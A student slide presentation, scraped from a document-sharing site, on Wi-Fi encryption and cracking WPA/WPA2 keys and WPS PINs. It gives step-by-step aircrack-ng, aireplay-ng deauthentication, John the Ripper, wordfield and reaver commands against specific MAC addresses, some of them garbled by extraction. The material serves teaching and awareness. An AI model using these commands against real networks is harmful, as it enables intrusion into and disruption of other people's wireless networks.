Upload File

wpa exploitation in the world of wireless network

  • Home
  • Documents
  • WPA Exploitation in the world of Wireless Network
34
WPA EXPLOITATION IN THE WORLD OF WIRELESS NETWORK By Hariraj Rathod 8 th sem Department of Electronics and Communication

Upload: buyuanggarende

Post on 25-Sep-2015

233 views

Category:

Documents


1 download

Report

DESCRIPTION

WPA Eksploitasi dalam dunia Jaringan Wireless

TRANSCRIPT

Hackerz Club v 2.O

WPA Exploitation in the world of Wireless NetworkBy Hariraj Rathod8th semDepartment of Electronics and CommunicationWifi Wireless FidelityWi-Fi, is a popular technology that allows an electronic device to exchange data or connect to the internetwirelesslyusing radio waves.

Wireless access allows users to connect to the internet from any location within range of a wireless access point.

Some Basic TermsMAC address or physical address is aunique identifier assigned tonetwork interfaces for communications

Access point >> Wireless router

SSID (service set identifier) >> Network Name

BSSID (basic service set identification) >> MAC address of the access point

Basic WorkingWhen a user uses wireless internet they generate what are called data packets. Packets are transmitted between the wireless card and the wireless access point via radio waves whenever the computer is connected with the access point.

Basic Working Contd.Depending on how long the computer is connected, it can generate a certain number of packets per day.

The more users that are connected to one access point, the more packets are generated.

Wireless uses Radio Frequency2.4 Ghz wifi spectrum

Wireless Encryption

The main source of vulnerability associated with wireless networks are the methods of encryption. Different type of wireless encryption are as follows:

WEP WPA WPA2

WEPStands for Wired Equivalent Privacy.

WEP is recognizable by the key of 10 or 26hexadecimaldigits.

WEP protocol was not developed by researchers or experts in security and cryptography.

Initial bytes of the key stream depended on just a few bits of the encryption key.WEP ContinuedWEP Encryption Process

ICV:-32 bit integrity check value (ICV)IV:- Initialization VectorWEP Continued WEP Decryption Process

With multiple wireless clients sending a large amount of data, an attacker can remotely capture large amounts of WEP ciphertext and use cryptanalysis methods to determine the WEP key.WPA or WPA2Stands for Wi-Fi Protected Access

Created to provide stronger security

Still able to be cracked if a short password is used.

If a long passphrase or password is used, these protocol are virtually not crackable.

WPA-PSK and TKIP(Temporal Key Integrity Protocol ) or AES(Advance Encryption Standard) use a Pre-Shared Key (PSK) that is more than7 and less than 64 characters in length.

WPS (WiFi protected Feature) simple plug and play feature.

Using Backtrack >>Some Basic Backtrack Terms >>Wlan1 wireless interfaceMon0 monitor modeHandshake refers to the negotiation process between the computer and a WiFi server using WPA encryption.Needed to crack WPA/WPA2.Dictionary - consisting the list of common passwords..cap file used to store packets.Monitor ModeMonitor mode, or RFMON (Radio Frequency MONitor) mode, allows a computer with awireless network interface controller (WNIC) to monitor all traffic received from the wireless network.

Monitor mode allows packets to be captured without having to associate with anaccess point first.Tools UsedAirmon-ng >> Placing different cards in monitor mode

Airodump-ng (Packet sniffer ) >> Tool used to listen to wireless routers in the area.

Aireplay-ng ( Packet injector ) >> Aireplay-ng is used to inject frames. The primary function is to generate traffic for the later use inaircrack-ng for cracking the WEP and WPA-PSK keys.

Aircrack-ng >> CracksWEPandWPA(Dictionary attack) keys.14Tools used.Continued Word Field (Brute Force)

Reaver Tool. (Brute Force)Aircrack-ng Selecting the Interface to put it in monitor mode. Command used airmon-ng start wlan1

Aircrack-ng continuedStart Capturing Packets.Airodump-ng mon0

Airodump-ng mon0 channel 1 bssid mac id w reddot

Aircrack-ng continuedDeauthenticate the device connected to access point and force them to re exchange WPA key.Aireplay-ng -o 4 -a F4:EC:38:BA:6C:44 c 90:4C:E5:B2:6F:D8 mon0 where "-0 4" tells aireplay to inject deauthentication packets (4 of them), "-a" is the wireless access point MAC address and "-c" is the client (victim) MAC address.

Aircrack-ng ContinuedAuthentication process in WPA

Aircrack-ng continued 4-way handshake os captured.

Aircrack-ng continuedCracking the WPA key using aircrack-ng, dictionary file and 4-way handshake captured file redot.cap aircrack-ng -w /home/pranav/download/password.lstb F4:EC:38:BA:6C:44 /home/pranav/reddot-01.cap where "-w" specifies the dictionary file to use.

John the ripperFaster then the previously used tool./pentest/password/john-1.7.6.jumbo12/run/john -stdout -incremantal all aircrack-ng b 00:17:9A:82:44:1B -w -/home/pranav/test-01.cap

Word FieldWord Field is a brute force attack.Command line used wordfield [OPTION...] MINLENGTH [MAXLENGTH]Wordfield -a -n 8 8" will output all possible alphanumeric strings which are 8 characters long.wordfield -a -n 8 8 | aircrack-ng b 00:17:9A:82:44:1B -w - /home/pranav/Wifire-02.capThis attack is really effective on weak keys.Word Field Continued The below took 22 hrs 7 minutes and 35 seconds

Dictionary and Brute force limitationsPassphrase cant be necessarily be found in Dictionary list hence it has its limitations.Brute force technics require lot of fast hardware computational power.

Source: http://lastbit.com/pswcalc.asp Reaver Tool.Reaver is fantastic tool to crack WPS pin written by Craig Heffner. This tool exploits the wps 8 digit pin.1 bit is a checksum bit.7 unknown numbers, meaning there are a possible 10^7 (10,000,000) combinations which will take approximately 116 days to break at 1 attempt every second.

Reaver Tool continuedWPS pin 65020920

Reaver Tool ContinuedFinding WPS victimwash I mon0

Reaver Tool ContinuedCracking techniqueWPS pin 6502-092010^4 (10,000) combinations.But since 1st bit is checksum bit hence the combinations reduce to 10^3(1000)This reduces the time required to break the PIN to just over 3 hours - Again, assuming that 1 attempt is made every second.

Reaver Tool continuedreaver -i mon0 b F4:EC:38:BA:6C:44

Reaver Tool Continued

Besecured

References Wi-Fi security WEP, WPA and WPA2 Guillaume Lehembrehttp://en.wikipedia.org/wiki/Wi-Fi_Protected_Access#WPS_PIN_recoveryhttps://sites.google.com/site/clickdeathsquad/Home/cds-wpacrackhttp://samiux.blogspot.in/2010/04/howto-crackwpawpa2-psk-with-john.htmlhttp://www.zer0trusion.com/2011/09/crackingwpa-without-dictionary.htmlTactical Network Solutions WiFi Security Megaprimer by Vivek Ramchandran

Thanks : )


Optimization of radio measurements exploitation in wireless mobile … · Optimization of radio measurements exploitation in wireless mobile networks Afef Ben Hadj Alaya-Feki, Alain

Cracking wep and wpa wireless networks

3Com OfficeConnect Wireless 108Mbps 11g PoE …vb.net/products/3COM/3CRGPOE10075.pdf · 3Com Office Connect Wireless 108Mbp s 11g PoE Acce ss Point TM WPA clients SSID 1 = WPA TM

WR100 300Mbps Wireless-N Repeater - LMi.net · WR100 300Mbps Wireless-N Repeater User Manual ... Note: WPS will work only for WPA-PSK, WPA2-PSK and WPA/WPA2 encryption. The wireless

Datasheet LF-P581 EN V1 · Gateway, Repeater(Extender), AP(access point), Wireless ISP Client Wireless Security 64/128-bit WEP, WPA/WPA2, WPA /WPA2-Personal (TKIP/AES) System Requirements

Chalmers University of Technology Wireless security Breaking WEP and WPA

Lecture 9: Wireless Security WEP/WPA · Lecture 9: Wireless Security – WEP/WPA CS 336/536: Computer Network Security Fall 2014 Nitesh Saxena ... 11/11/2014 Lecture 9 - Wireless

Lab 7: Wireless Exploitation & Defenses › fengwei › 17sp-csc4992 › labs › lab7... · Lab 7: Wireless Exploitation & Defenses Introduction In this lab students will explore

Unofficial Wireless Setup Guide for Nokia Symbian Handsets - RMIT-WPA

Wireless LAN Security CS391. Overview Wireless LAN Topology 802.11 Standards Simple Security WEP 802.1x WPA 802.11i

Wireless LAN Security II: WEP Attacks, WPA and WPA2

Lecture 9: Wireless Security – WEP/WPA

Setting up Windows 7 for WPA Wireless Access (ISU … up Windows 7 for WPA Wireless Access (ISU-OIT-WPA) ISU OIT Internal Document V10 Page 1 Preface: The ISU-OIT-WPA implementation

WPA - Setup for the Wireless Printers · WPA-PSK is a special mode of WPA ,usually for the home users without an enterprise authentication (radius) server. PSK uses encryption where

Wi-Fi security – WEP, WPA and WPA2 - Ubuntu Drivers · Wi-Fi security – WEP, WPA and WPA2 Guillaume Lehembre Difficulty Wi-Fi (Wireless Fidelity) is one of today’s leading wireless

WPA(2) Wireless Alphabet 802 - WMMI.net · Wireless Alphabet Soup EAP PEAP WPA(1) WPA(2) AES TSN RSN TKIP WEP CCMP WN AP AS EAPOL RADIUS SP 802.1x 802.11i CBC-MAC PAP CHAP ... The

Wireless Dual Band Gigabit ADSL2+ Modem Router · 2016. 8. 9. · · Wireless Security: 64/128-bit WEP, WPA/WPA2, WPA-PSK/WPA-PSK2 encryptions, Wireless MAC Filtering · Wireless

Dir412 Wireless Wpa

Wireless Networking. cs490ns - cotter2 Outline Wireless Network Communications –Background –Security Issues –WEP / WPA

SECURING YOUR WIRELESS NETWORK - Palomar · SECURING YOUR WIRELESS NETWORK ENABLING WPA WEP, WPA, and WPA2 use data encryp on to protect your wireless network from intruders. 1 LOG

Setting up Windows Vista for WPA Wireless Access (ISU-OIT-WPA) 10.pdf · Setting up Windows Vista for WPA Wireless Access (ISU-OIT-WPA) ISU OIT Internal Document V10 Page 8 7.) Click

Rede Wireless segura com WPA/WPA2 e RADIUS Por Patrick Brandão – TMSoft

Digital Wireless Communication: Physical Layer Exploitation

NEC Portable Projector NP905/NP901W WIRELESS NP905/NP901W WPA Setting Guide NEC Portable Projector Supported Authentication Method WPA-PSK WPA-EAP WPA2-PSK WPA2-EAP NOTES (1) The contents

General Trifold20151008 email - solwise.co.uk | Solwise Ltd...Wireless Security (WEP, WPA(2)) Enterprise WPA(2)-PSK Neutron Series: EnGenius EWS AP Series Wireless Configuration •

Lab 7: Wireless Exploitation & Defenses · 2020-03-06 · Aircrack-ng is a network software suite consisting of a detector, packet sniffer, WEP and WPA/WPA2-PSK cracker and analysis

Slide 1 SCSC 555 Hacking Wireless Networks (Part II – WEP & WPA)

300Mbps Wireless N Router - TP-Link · Wireless Statistics · Wireless Security: 64/128/152-bit WEP / WPA / WPA2, WPA-PSK / WPA2-PSK · Wireless Security: 64/128/152-bit WEP, WPA

Auditoria Wireless Con WPA

ISA 564, Laboratory 5 Wireless Exploitation & Defensesastavrou/courses/ISA_564_F15/Laboratory6... · ISA 564, Laboratory 5 Wireless Exploitation & Defenses ... To retrieve a list

Wireless Security: The need for WPA and 802.11i

Setting up Windows Vista for WPA Wireless Access … up Windows Vista for WPA Wireless Access (ISU-OIT-WPA) ISU OIT Internal Document V10 Page 2 Setting up WPA on Windows Vista Secured

Laporan Instalasi LAN - Wireless Security (WEP, WPA-PSK, MAC Filtering)

The Black Art of Wireless Post-Exploitation

Wireless LAN Security II: WEP Attacks, WPA and WPA2jain/cse571-09/ftp/l_20wpa.pdf · Wireless LAN Security II: WEP Attacks, WPA and WPA2 ... WiFi stations authenticate and then associate